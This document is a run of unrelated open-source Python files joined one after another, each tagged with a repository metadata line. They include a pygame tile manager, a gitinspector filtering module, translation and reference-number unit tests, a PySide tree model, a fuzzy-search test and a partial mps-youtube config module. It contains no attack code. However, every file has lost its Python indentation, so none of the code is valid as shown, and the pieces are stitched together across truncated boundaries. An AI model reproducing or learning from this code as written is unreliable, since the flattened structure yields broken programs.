def build_color_tiles(color, sizes, nframes, reverse=False, sin=True):
imgs = []
for size in sizes:
img = pygame.Surface((size,)*2)
img.fill(color)
imgs.append(get_shifted_tiles(img, nframes, 0, 0, reverse, sin))
return imgs
def get_radiuses(nframes, initial_value, increment, reverse=False, sin=True):
values = []
if sin:
current = initial_value
else:
current = 0
for i in range(nframes):
if sin:
delta = increment*math.sin(2.*math.pi*i/float(nframes))
else:
delta = increment
current += delta
values.append(int(current))
if reverse:
values = values[::-1][1:-1]
return values
def build_tilers(grasses, waters, radius_divider, use_beach_tiler):
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom):
cell_size = grasses[z][0].get_width()
radius = cell_size//radius_divider
for n in range(nframes):
if use_beach_tiler:
tiler = BeachTiler(grasses[z][n], waters[z][n])
tiler.make(size=(cell_size,)*2, radius=radius)
else:
tiler = BaseTiler(grasses[z][n])
tiler.make(size=(cell_size,)*2, radius=0)
tilers[z][n] = tiler
return tilers
def build_static_tilers(grasses, waters, radius_divider, use_beach_tiler):
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom):
cell_size = grasses[z][0].get_width()
radius = cell_size//radius_divider
if use_beach_tiler:
tiler = BeachTiler(grasses[z][0], waters[z][0])
tiler.make(size=(cell_size,)*2, radius=radius)
else:
tiler = BaseTiler(grasses[z][0])
tiler.make(size=(cell_size,)*2, radius=0)
for n in range(nframes):
tilers[z][n] = tiler
return tilers
def build_tilers_fast(grasses, waters, radius_divider, use_beach_tiler):
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
cell_size = grasses[0][0].get_width()
radius = cell_size//radius_divider
for n in range(nframes):
if use_beach_tiler:
tiler = BeachTiler(grasses[0][n], waters[0][n])
tiler.make(size=(cell_size,)*2, radius=radius)
else:
tiler = BaseTiler(grasses[0][n])
tiler.make(size=(cell_size,)*2, radius=0)
tilers[0][n] = tiler
if nzoom > 1:
for z in range(1,nzoom):
for n in range(nframes):
if use_beach_tiler:
tiler = BeachTiler(grasses[z][n], waters[z][n])
else:
tiler = BaseTiler(grasses[z][n])
size = grasses[z][n].get_size()
ref = tilers[0][n]
for key in ref.imgs:
tiler.imgs[key] = pygame.transform.scale(ref.imgs[key], size)
tilers[z][n] = tiler
return tilers
def load_tilers_dynamic(i, grasses, waters, folder): #pour static, nframes=1
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom): #PEUT ETRE LARGEMENT OPTIMIZE VU QUE ON POURRAIT LOADER UNE SEULE FOIS CHAQUE IMAGE, A LA PLACE DE z FOIS
cell_size = grasses[z][0].get_width()
for n in range(nframes):
basename = os.path.join(folder,str(i)+"_"+str(n)+"_")
tilers[z][n] = LoadTiler(basename, (cell_size,)*2)
return tilers
def load_tilers_static(i, grasses, waters, folder): #pour static, nframes=1
nzoom = len(grasses)
assert nzoom == len(waters) #same number of zoom levels
nframes = len(grasses[0])
for z in range(nzoom):
assert nframes == len(waters[z]) #same number of frames
tilers = [[None for n in range(nframes)] for z in range(nzoom)]
for z in range(nzoom): #PEUT ETRE LARGEMENT OPTIMIZE VU QUE ON POURRAIT LOADER UNE SEULE FOIS CHAQUE IMAGE, A LA PLACE DE z FOIS
cell_size = grasses[z][0].get_width()
basename = os.path.join(folder,str(i)+"_"+str(0)+"_")
tiler = LoadTiler(basename, (cell_size,)*2)
for n in range(nframes):
tilers[z][n] = tiler
return tilers
def get_material_couples(materials, radius_divider, fast, use_beach_tiler,
load_tilers):
materials.sort(key=lambda x:x.hmax)
couples = []
imgs_zoom0_mat0 = materials[0].imgs[0]
nframes = len(imgs_zoom0_mat0)
max_cell_size = imgs_zoom0_mat0[0].get_width()
for i in range(len(materials)-1):
print(" Building tilers for couple", i)
assert nframes == len(materials[i+1].imgs[0])
couple = MaterialCouple(i, materials[i], materials[i+1], radius_divider,
max_cell_size, fast, use_beach_tiler, load_tilers)
couples.append(couple)
return couples
def get_couple(h, couples):
if h < 0.:
return couples[0]
else:
for couple in couples:
if couple.grass.hmax > h:
return couple
return couples[-1]
class Material:
def __init__(self, name, hmax, imgs, static):
self.name = name
self.hmax = hmax
self.imgs = imgs
self.static = static
class MaterialCouple:
def __init__(self, i, material1, material2, radius_divider, max_cell_size,
fast, use_beach_tiler, load_tilers):
if not has_surfarray and not load_tilers:
raise Exception("Numpy was not found, and tilers are not loaded")
assert material1.hmax != material2.hmax
if material1.hmax > material2.hmax:
self.grass, self.water = material1, material2
else:
self.grass, self.water = material2, material1
#
if load_tilers:
if material1.static and material2.static:
self.static = True
self.tilers = load_tilers_static(i, self.grass.imgs, self.water.imgs, load_tilers)
else:
self.static = False
self.tilers = load_tilers_dynamic(i, self.grass.imgs, self.water.imgs, load_tilers)
else:
build_tilers_static = build_static_tilers
if fast:
build_tilers_dynamic = build_tilers_fast
else:
build_tilers_dynamic = build_tilers
if material1.static and material2.static:
self.static = True
self.tilers = build_tilers_static(self.grass.imgs, self.water.imgs,
radius_divider, use_beach_tiler)
else:
self.static = False
self.tilers = build_tilers_dynamic(self.grass.imgs, self.water.imgs,
radius_divider, use_beach_tiler)
self.transition = self.water.hmax
self.max_cell_size = max_cell_size
def get_tilers(self, zoom):
return self.tilers[zoom]
def get_cell_size(self, zoom):
return self.tilers[zoom][0].imgs["c"].get_width()
def get_all_frames(self, zoom, type_):
return [self.tilers[zoom][t].imgs[type_] for t in range(len(self.tilers[zoom]))]
| YannThorimbert/PyWorld2D | rendering/tilers/tilemanager.py | Python | mit | 11,093 | 0.009015 |
# coding: utf-8
#
# Copyright © 2012-2014 Ejwa Software. All rights reserved.
#
# This file is part of gitinspector.
#
# gitinspector is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# gitinspector is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gitinspector. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
from __future__ import unicode_literals
import re
import textwrap
from gitinspector.localization import N_
from gitinspector.outputable import Outputable
from gitinspector import terminal
__filters__ = {"file": [[], set()], "author": [[], set()], "email": [[], set()]}
class InvalidRegExpError(ValueError):
def __init__(self, msg):
super(InvalidRegExpError, self).__init__(msg)
self.msg = msg
def get():
return __filters__
def __add_one__(string):
for i in __filters__:
if (i + ":").lower() == string[0:len(i) + 1].lower():
__filters__[i][0].append(string[len(i) + 1:])
return
__filters__["file"][0].append(string)
def add(string):
rules = string.split(",")
for rule in rules:
__add_one__(rule)
def clear():
for i in __filters__:
__filters__[i][0] = []
def get_filered(filter_type="file"):
return __filters__[filter_type][1]
def has_filtered():
for i in __filters__:
if __filters__[i][1]:
return True
return False
def set_filtered(string, filter_type="file"):
string = string.strip()
if len(string) > 0:
for i in __filters__[filter_type][0]:
try:
if re.search(i, string) != None:
__filters__[filter_type][1].add(string)
return True
except:
raise InvalidRegExpError(_("invalid regular expression specified"))
return False
FILTERING_INFO_TEXT = N_(
"The following files were excluded from the statistics due to the specified exclusion patterns")
FILTERING_AUTHOR_INFO_TEXT = N_(
"The following authors were excluded from the statistics due to the specified exclusion patterns")
FILTERING_EMAIL_INFO_TEXT = N_(
"The authors with the following emails were excluded from the statistics due to the specified exclusion patterns")
class Filtering(Outputable):
@staticmethod
def __output_html_section__(info_string, filtered):
filtering_xml = ""
if filtered:
filtering_xml += "<p>" + info_string + "." + "</p>"
for i in filtered:
filtering_xml += "<p>" + i + "</p>"
return filtering_xml
def output_html(self):
if has_filtered():
filtering_xml = "<div><div class=\"box\">"
Filtering.__output_html_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
Filtering.__output_html_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
Filtering.__output_html_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])
filtering_xml += "</div></div>"
print(filtering_xml)
@staticmethod
def __output_text_section__(info_string, filtered):
if filtered:
print("\n" + textwrap.fill(info_string + ":", width=terminal.get_size()[0]))
for i in filtered:
(width, _unused) = terminal.get_size()
print("...%s" % i[-width + 3:] if len(i) > width else i)
def output_text(self):
Filtering.__output_text_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
Filtering.__output_text_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
Filtering.__output_text_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])
@staticmethod
def __output_xml_section__(info_string, filtered, container_tagname):
if filtered:
message_xml = "\t\t\t<message>" + info_string + "</message>\n"
filtering_xml = ""
for i in filtered:
filtering_xml += "\t\t\t\t<entry>".format(container_tagname) + i + "</entry>\n".format(
container_tagname)
print("\t\t<{0}>".format(container_tagname))
print(message_xml + "\t\t\t<entries>\n" + filtering_xml + "\t\t\t</entries>\n")
print("\t\t</{0}>".format(container_tagname))
def output_xml(self):
if has_filtered():
print("\t<filtering>")
Filtering.__output_xml_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1], "files")
Filtering.__output_xml_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1], "authors")
Filtering.__output_xml_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1], "emails")
print("\t</filtering>")
| vpol/gitinspector | gitinspector/filtering.py | Python | gpl-3.0 | 5,218 | 0.003642 |
# -*- coding: utf-8 -*-
import os
from mock import Mock, patch
from maidchan.translate import get_trans_language_prediction, get_translation
SCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))
def _get_response(name):
path = os.path.join(SCRIPT_PATH, 'data', name)
with open(path) as f:
return f.read().encode("utf-8")
def mocked_trans(*args, **kwargs):
"""
Mocked "trans"
"""
process_mock = Mock()
return_value = None
if '-id' in args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_prediction.txt')
elif '-b' in args[0] and 'en:ja' in args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_translation.txt')
elif '-b' in args[0] and 'en:id' in args[0] and 'hello, world!' in args[0]:
return_value = _get_response('get_trans_translation_2.txt')
attrs = {'communicate.return_value': (return_value, None)}
process_mock.configure_mock(**attrs)
return process_mock
class TestTranslate:
@patch('subprocess.Popen', side_effect=mocked_trans)
def test_get_translate_language_prediction(self, mock_trans):
assert get_trans_language_prediction("hello, world!") == "en"
@patch('subprocess.Popen', side_effect=mocked_trans)
def test_get_translation_en_to_ja(self, mock_trans):
query = "translate hello, world! from english to japanese"
assert get_translation(query) == "こんにちは世界!"
@patch('subprocess.Popen', side_effect=mocked_trans)
def test_get_translation_en_to_default(self, mock_trans):
query = "translate hello, world! from english"
assert get_translation(query) == "こんにちは世界!"
@patch('subprocess.Popen', side_effect=mocked_trans)
def test_get_translation_default_to_id(self, mock_trans):
query = "translate hello, world! to bahasa"
assert get_translation(query) == "Halo Dunia!"
| freedomofkeima/messenger-maid-chan | tests/test_translate.py | Python | mit | 1,946 | 0 |
#from PySide import QtGui, QtCore
#from cube_list import CubeItem, RootItem
#
#class TreeModel(QtGui.QStandardItemModel):
# def __init__(self, rows, columns, contCubes, indCubes, parent = None):
# super(TreeModel, self).__init__(rows, columns, parent)
# self.contCubes = contCubes
# self.indCubes = indCubes
#
## self.rootItem = CubeItem()
#
# def flags(self, index):
# if index.parent() == QtCore.QModelIndex():
# return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
#
# if index.column() == 1 or index.column() == 2:
# return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
#
#
# return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable
#
# def setData(self, index, value, role=QtCore.Qt.EditRole):
# if role != QtCore.Qt.EditRole:
# return False
# variant = value
# if index.column() == 0:
# value = str(value.toString())
#
# if index.row() == 0:
# self.contCubes.setName(value, index.row())
# if index.row() == 1: #index.parent.row()==1
# self.indCubes.setName(value, index.row())
#
# result = True
#
# if index.column() == 3:
# value = int(value)
#
# if index.row() == 0:
# self.contCubes.changeUndefValue(value, index.row())
# if index.row() == 1:
# self.indCubes.changeUndefValue(value, index.row())
#
# result = True
#
# if result:
# self.dataChanged.emit(index, index)
# return result
from PySide import QtCore, QtGui
class TreeItem(object):
def __init__(self, data, parent=None):
self.parentItem = parent
self.itemData = data
self.childItems = []
def child(self, row):
return self.childItems[row]
def childCount(self):
return len(self.childItems)
def childNumber(self):
if self.parentItem != None:
return self.parentItem.childItems.index(self)
return 0
def columnCount(self):
return len(self.itemData)
def data(self, column):
return self.itemData[column]
def insertChildren(self, position, count, columns):
if position < 0 or position > len(self.childItems):
return False
for row in range(count):
data = [None for v in range(columns)]
item = TreeItem(data, self)
self.childItems.insert(position, item)
return True
def insertColumns(self, position, columns):
if position < 0 or position > len(self.itemData):
return False
for column in range(columns):
self.itemData.insert(position, None)
for child in self.childItems:
child.insertColumns(position, columns)
return True
def parent(self):
return self.parentItem
def removeChildren(self, position, count):
if position < 0 or position + count > len(self.childItems):
return False
for row in range(count):
self.childItems.pop(position)
return True
def removeColumns(self, position, columns):
if position < 0 or position + columns > len(self.itemData):
return False
for column in range(columns):
self.itemData.pop(position)
for child in self.childItems:
child.removeColumns(position, columns)
return True
def setData(self, column, value):
if column < 0 or column >= len(self.itemData):
return False
self.itemData[column] = value
return True
class TreeModel(QtCore.QAbstractItemModel):
def __init__(self, headers, contCubes, indCubes, parent=None):
super(TreeModel, self).__init__(parent)
self.contCubes = contCubes
self.indCubes = indCubes
rootData = [header for header in headers]
self.rootItem = TreeItem(rootData)
# self.setupModelData(data.split("\n"), self.rootItem)
def columnCount(self, parent=QtCore.QModelIndex()):
return self.rootItem.columnCount()
def data(self, index, role):
if not index.isValid():
return None
if role == QtCore.Qt.DecorationRole:
if self.getItem(index).parent() == self.rootItem:
if index.column() == 0:
if index.row() == 0:
pixmap = QtGui.QPixmap()
pixmap.load(':/icons/cont.png')
pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio,
transformMode=QtCore.Qt.SmoothTransformation)
return pixmap
if index.row() == 1:
pixmap = QtGui.QPixmap()
pixmap.load(':/icons/ind.png')
pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio,
transformMode=QtCore.Qt.SmoothTransformation)
return pixmap
if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.EditRole:
item = self.getItem(index)
return item.data(index.column())
return None
def flags(self, index):
parentItem = self.getItem(index).parent()
if parentItem == self.rootItem:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
if index.column() == 1 or index.column() == 2:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable
def getItem(self, index):
if index.isValid():
item = index.internalPointer()
if item:
return item
return self.rootItem
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
return self.rootItem.data(section)
return None
def index(self, row, column, parent=QtCore.QModelIndex()):
if parent.isValid() and parent.column() != 0:
return QtCore.QModelIndex()
parentItem = self.getItem(parent)
childItem = parentItem.child(row)
if childItem:
return self.createIndex(row, column, childItem)
else:
return QtCore.QModelIndex()
def insertColumns(self, position, columns, parent=QtCore.QModelIndex()):
self.beginInsertColumns(parent, position, position + columns - 1)
success = self.rootItem.insertColumns(position, columns)
self.endInsertColumns()
return success
def insertRows(self, position, rows, parent=QtCore.QModelIndex()):
parentItem = self.getItem(parent)
self.beginInsertRows(parent, position, position + rows - 1)
success = parentItem.insertChildren(position, rows,
self.rootItem.columnCount())
self.endInsertRows()
return success
def parent(self, index):
if not index.isValid():
return QtCore.QModelIndex()
childItem = self.getItem(index)
parentItem = childItem.parent()
if parentItem == self.rootItem:
return QtCore.QModelIndex()
return self.createIndex(parentItem.childNumber(), 0, parentItem)
def removeColumns(self, position, columns, parent=QtCore.QModelIndex()):
self.beginRemoveColumns(parent, position, position + columns - 1)
success = self.rootItem.removeColumns(position, columns)
self.endRemoveColumns()
if self.rootItem.columnCount() == 0:
self.removeRows(0, self.rowCount())
return success
def removeRows(self, position, rows, parent=QtCore.QModelIndex()):
parentItem = self.getItem(parent)
self.beginRemoveRows(parent, position, position + rows - 1)
success = parentItem.removeChildren(position, rows)
self.endRemoveRows()
return success
def rowCount(self, parent=QtCore.QModelIndex()):
parentItem = self.getItem(parent)
return parentItem.childCount()
def setData(self, index, value, role=QtCore.Qt.EditRole):
#print index.row(), index.column()
if role != QtCore.Qt.EditRole:
return False
item = self.getItem(index)
try:
result = item.setData(index.column(), value)
if index.column() == 0:
value = str(value.toString())
if index.parent().row() == 0:
self.contCubes.setName(value, index.row())
if index.parent().row() == 1:
self.indCubes.setName(value, index.row())
result = True
if index.column() == 3:
value = int(value)
print 'Yeap, i am here, value=', value
if index.parent().row() == 0:
self.contCubes.changeUndefValue(value, index.row())
if index.parent().row() == 1:
self.indCubes.changeUndefValue(value, index.row())
result = True
except:
result = False
if result:
self.dataChanged.emit(index, index)
return result
def setHeaderData(self, section, orientation, value, role=QtCore.Qt.EditRole):
if role != QtCore.Qt.EditRole or orientation != QtCore.Qt.Horizontal:
return False
result = self.rootItem.setData(section, value)
if result:
self.headerDataChanged.emit(orientation, section, section)
return result
#class MainWindow(QtGui.QWidget):
# def __init__(self, parent = None):
# QtGui.QWidget.__init__(self, parent)
#
# header = ['1', '2', '3']
# model = TreeModel(header)
#
# self.tree = QtGui.QTreeView()
# self.tree.setModel(model)
#
# vbox = QtGui.QVBoxLayout()
# self.setLayout(vbox)
# vbox.addWidget(self.tree)
#
# self.insertRow(['1', '2', '3'])
# self.insertRow(['4', '5', '6'])
#
# index = model.index(0, 0)
# print model.data(index, QtCore.Qt.DisplayRole)
# self.insertChild(['5', '15', '25'], index)
#
# def insertChild(self, data, index = None):
# if index == None:
# index = self.tree.selectionModel().currentIndex()
# model = self.tree.model()
#
# if not model.insertRow(0, index):
# return
#
# for column in range(model.columnCount(index)):
# child = model.index(0, column, index)
# model.setData(child, data[column], QtCore.Qt.EditRole)
#
# def insertRow(self, data, index = None):
# if index == None:
# index = self.tree.selectionModel().currentIndex()
# model = self.tree.model()
#
# if not model.insertRow(index.row()+1, index.parent()):
# return
#
# for column in range(model.columnCount(index.parent())):
# child = model.index(index.row()+1, column, index.parent())
# model.setData(child, data[column], QtCore.Qt.EditRole)
#
#if __name__ == "__main__":
# import sys
# app = QtGui.QApplication(sys.argv)
# gui = MainWindow()
# gui.show()
# sys.exit(app.exec_())
| Snegovikufa/HPGL-GUI | gui_widgets/treemodel.py | Python | gpl-2.0 | 12,137 | 0.004696 |
# -*- coding: utf-8 -*-
import random
import pytest
from holviapi.utils import (
ISO_REFERENCE_VALID,
fin_reference_isvalid,
int2fin_reference,
iso_reference_isvalid,
str2iso_reference
)
def test_fin_reference_isvalid_valid_results():
"""Test handpicked, known-good inputs"""
assert fin_reference_isvalid(13)
assert fin_reference_isvalid(107)
assert fin_reference_isvalid(105523)
assert fin_reference_isvalid(102319)
assert fin_reference_isvalid(108326)
assert fin_reference_isvalid(100816)
assert fin_reference_isvalid(108724)
assert fin_reference_isvalid(108711)
def test_fin_reference_isvalid_invalid_results():
"""Test handpicked, known-bad inputs"""
assert not fin_reference_isvalid(1071110)
assert not fin_reference_isvalid(1055110)
assert not fin_reference_isvalid(1026110)
assert not fin_reference_isvalid(1039110)
assert not fin_reference_isvalid(1084110)
def test_int2fin_reference_valid_results():
"""Test handpicked, known-good inputs and corresponding outputs"""
assert int2fin_reference(1) == '13'
assert int2fin_reference(10) == '107'
assert int2fin_reference(10552) == '105523'
assert int2fin_reference(10231) == '102319'
assert int2fin_reference(10832) == '108326'
assert int2fin_reference(10081) == '100816'
assert int2fin_reference(10872) == '108724'
assert int2fin_reference(10871) == '108711'
def test_int2fin_reference_invalid_results():
"""Test some invalid values from issue #6"""
assert int2fin_reference(10711) != '1071110'
assert int2fin_reference(10551) != '1055110'
assert int2fin_reference(10261) != '1026110'
assert int2fin_reference(10391) != '1039110'
assert int2fin_reference(10841) != '1084110'
def test_int2fin_reference_random_inputs():
for x in range(1000):
testint = random.randint(1, 2**24)
reference = int2fin_reference(testint)
assert fin_reference_isvalid(reference)
def test_str2iso_reference_valid_results():
assert str2iso_reference('C2H5OH') == 'RF97C2H5OH'
def test_str2iso_reference_invalid_results():
assert str2iso_reference('C2H5OH') != 'RF40C2H5OH'
def test_iso_reference_isvalid_valid_results():
assert iso_reference_isvalid('RF97C2H5OH')
def test_iso_reference_isvalid_invalid_results():
assert not iso_reference_isvalid('RF40C2H5OH')
def test_str2iso_reference_random_integers():
for x in range(1000):
testint = random.randint(1, 2**24)
reference = str2iso_reference(str(testint))
assert iso_reference_isvalid(reference)
def test_str2iso_reference_random_strings():
for x in range(1000):
teststr = ''
for y in range(5, 14):
teststr += random.choice(ISO_REFERENCE_VALID)
reference = str2iso_reference(teststr)
assert iso_reference_isvalid(reference)
| rambo/python-holviapi | holviapi/tests/test_refnos.py | Python | mit | 2,888 | 0 |
#!/usr/bin/env python3.4
# -*- coding: utf-8 -*-
| welblade/pyrom | test/__init__.py | Python | mit | 49 | 0 |
import pytest
from awsshell.fuzzy import fuzzy_search
@pytest.mark.parametrize("search,corpus,expected", [
('foo', ['foobar', 'foobaz'], ['foobar', 'foobaz']),
('f', ['foo', 'foobar', 'bar'], ['foo', 'foobar']),
('fbb', ['foo-bar-baz', 'fo-ba-baz', 'bar'], ['foo-bar-baz', 'fo-ba-baz']),
('fff', ['fi-fi-fi', 'fo'], ['fi-fi-fi']),
# The more chars it matches, the higher the score.
('pre', ['prefix', 'pre', 'not'], ['pre', 'prefix']),
('nomatch', ['noma', 'nomatccc'], []),
])
def test_subsequences(search, corpus, expected):
actual = fuzzy_search(search, corpus)
assert actual == expected
| awslabs/aws-shell | tests/unit/test_fuzzy.py | Python | apache-2.0 | 629 | 0 |
from akara.dist import setup
setup(name="basic",
version="1.0",
akara_extensions=["blah.py"]
)
| uogbuji/akara | test/setup_scripts/setup_basic.py | Python | apache-2.0 | 108 | 0.009259 |
import os
import re
import sys
import copy
import pickle
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.parse import urlencode
try:
import pylast
has_pylast = True
except ImportError:
has_pylast = False
import pafy
from . import g, c, paths, util
mswin = os.name == "nt"
class ConfigItem:
""" A configuration item. """
def __init__(self, name, value, minval=None, maxval=None, check_fn=None,
require_known_player=False, allowed_values=None):
""" If specified, the check_fn should return a dict.
{valid: bool, message: success/fail mesage, value: value to set}
"""
self.default = self.value = value
self.name = name
self.type = type(value)
self.maxval, self.minval = maxval, minval
self.check_fn = check_fn
self.require_known_player = require_known_player
self.allowed_values = []
if allowed_values:
self.allowed_values = allowed_values
@property
def get(self):
""" Return value. """
return self.value
@property
def display(self):
""" Return value in a format suitable for display. """
retval = self.value
if self.name == "max_res":
retval = str(retval) + "p"
if self.name == "encoder":
retval = str(retval) + " [%s]" % (str(g.encoders[retval]['name']))
return retval
def set(self, value):
""" Set value with checks. """
# note: fail_msg should contain %s %s for self.name, value
# success_msg should not
# pylint: disable=R0912
# too many branches
success_msg = fail_msg = ""
value = value.strip()
value_orig = value
# handle known player not set
if self.allowed_values and value not in self.allowed_values:
fail_msg = "%s must be one of * - not %s"
allowed_values = copy.copy(self.allowed_values)
if '' in allowed_values:
allowed_values[allowed_values.index('')] = "<nothing>"
fail_msg = fail_msg.replace("*", ", ".join(allowed_values))
if self.require_known_player and \
not util.is_known_player(Config.PLAYER.get):
fail_msg = "%s requires mpv or mplayer, can't set to %s"
# handle true / false values
elif self.type == bool:
if value.upper() in "0 OFF NO DISABLED FALSE".split():
value = False
success_msg = "%s set to False" % c.c("g", self.name)
elif value.upper() in "1 ON YES ENABLED TRUE".split():
value = True
success_msg = "%s set to True" % c.c("g", self.name)
else:
fail_msg = "%s requires True/False, got %s"
# handle int values
elif self.type == int:
if not value.isdigit():
fail_msg = "%s requires a number, got %s"
else:
value = int(value)
if self.maxval and self.minval:
if not self.minval <= value <= self.maxval:
m = " must be between %s and %s, got "
m = m % (self.minval, self.maxval)
fail_msg = "%s" + m + "%s"
if not fail_msg:
dispval = value or "None"
success_msg = "%s set to %s" % (c.c("g", self.name),
dispval)
# handle space separated list
elif self.type == list:
success_msg = "%s set to %s" % (c.c("g", self.name), value)
value = value.split()
# handle string values
elif self.type == str:
dispval = value or "None"
success_msg = "%s set to %s" % (c.c("g", self.name),
c.c("g", dispval))
# handle failure
if fail_msg:
failed_val = value_orig.strip() or "<nothing>"
colvals = c.y + self.name + c.w, c.y + failed_val + c.w
return fail_msg % colvals
elif self.check_fn:
checked = self.check_fn(value)
value = checked.get("value") or value
if checked['valid']:
value = checked.get("value", value)
self.value = value
Config.save()
return checked.get("message", success_msg)
else:
return checked.get('message', fail_msg)
elif success_msg:
self.value = value
Config.save()
return success_msg
def check_console_width(val):
""" Show ruler to check console width. """
valid = True
message = "-" * val + "\n"
message += "console_width set to %s, try a lower value if above line ove"\
"rlaps" % val
return dict(valid=valid, message=message)
def check_api_key(key):
""" Validate an API key by calling an API endpoint with no quota cost """
url = "https://www.googleapis.com/youtube/v3/i18nLanguages"
query = {"part": "snippet", "fields": "items/id", "key": key}
try:
urlopen(url + "?" + urlencode(query)).read()
message = "The key, '" + key + "' will now be used for API requests."
# Make pafy use the same api key
pafy.set_api_key(Config.API_KEY.get)
return dict(valid=True, message=message)
except HTTPError:
message = "Invalid key or quota exceeded, '" + key + "'"
return dict(valid=False, message=message)
def check_ddir(d):
""" Check whether dir is a valid directory. """
expanded = os.path.expanduser(d)
if os.path.isdir(expanded):
message = "Downloads will be saved to " + c.y + d + c.w
return dict(valid=True, message=message, value=expanded)
else:
message = "Not a valid directory: " + c.r + d + c.w
return dict(valid=False, message=message)
def check_win_pos(pos):
""" Check window position input. """
if not pos.strip():
return dict(valid=True, message="Window position not set (default)")
pos = pos.lower()
reg = r"(TOP|BOTTOM).?(LEFT|RIGHT)"
if not re.match(reg, pos, re.I):
msg = "Try something like top-left or bottom-right (or default)"
return dict(valid=False, message=msg)
else:
p = re.match(reg, pos, re.I).groups()
p = "%s-%s" % p
msg = "Window position set to %s" % p
return dict(valid=True, message=msg, value=p)
def check_win_size(size):
""" Check window size input. """
if not size.strip():
return dict(valid=True, message="Window size not set (default)")
size = size.lower()
reg = r"\d{1,4}x\d{1,4}"
if not re.match(reg, size, re.I):
msg = "Try something like 720x480"
return dict(valid=False, message=msg)
else:
return dict(valid=True, value=size)
def check_encoder(option):
""" Check encoder value is acceptable. """
encs = g.encoders
if option >= len(encs):
message = "%s%s%s is too high, type %sencoders%s to see valid values"
message = message % (c.y, option, c.w, c.g, c.w)
return dict(valid=False, message=message)
else:
message = "Encoder set to %s%s%s"
message = message % (c.y, encs[option]['name'], c.w)
return dict(valid=True, message=message)
def check_player(player):
""" Check player exefile exists and get mpv version. """
if util.has_exefile(player):
print(player)
util.assign_player(player)
if "mpv" in player:
version = "%s.%s.%s" % g.mpv_version
fmt = c.g, c.w, c.g, c.w, version
msg = "%splayer%s set to %smpv%s (version %s)" % fmt
return dict(valid=True, message=msg, value=player)
else:
msg = "%splayer%s set to %s%s%s" % (c.g, c.w, c.g, player, c.w)
return dict(valid=True, message=msg, value=player)
else:
if mswin and not (player.endswith(".exe") or player.endswith(".com")):
# Using mpv.exe has issues; use mpv.com
if "mpv" in player:
retval = check_player(player + ".com")
if retval["valid"]:
return retval
return check_player(player + ".exe")
else:
msg = "Player application %s%s%s not found" % (c.r, player, c.w)
return dict(valid=False, message=msg)
def check_lastfm_password(password):
if not has_pylast:
msg = "pylast not installed"
return dict(valid=False, message=msg)
password_hash = pylast.md5(password)
return dict(valid=True, value=password_hash)
class _Config:
""" Holds various configuration values. """
_configitems = [
ConfigItem("order", "relevance",
allowed_values="relevance date views rating title".split()),
ConfigItem("user_order", "", allowed_values =
[""] + "relevance date views rating".split()),
ConfigItem("max_results", 19, maxval=50, minval=1),
ConfigItem("console_width", 80, minval=70,
maxval=880, check_fn=check_console_width),
ConfigItem("max_res", 2160, minval=192, maxval=2160),
ConfigItem("player", "mplayer" + ".exe" * mswin,
check_fn=check_player),
ConfigItem("playerargs", ""),
ConfigItem("encoder", 0, minval=0, check_fn=check_encoder),
ConfigItem("notifier", ""),
ConfigItem("checkupdate", True),
ConfigItem("show_player_keys", True, require_known_player=True),
ConfigItem("fullscreen", False, require_known_player=True),
ConfigItem("show_status", True),
ConfigItem("columns", ""),
ConfigItem("ddir", paths.get_default_ddir(), check_fn=check_ddir),
ConfigItem("overwrite", True),
ConfigItem("show_video", False),
ConfigItem("search_music", True),
ConfigItem("window_pos", "", check_fn=check_win_pos,
require_known_player=True),
ConfigItem("window_size", "",
check_fn=check_win_size, require_known_player=True),
ConfigItem("download_command", ''),
ConfigItem("lastfm_username", ''),
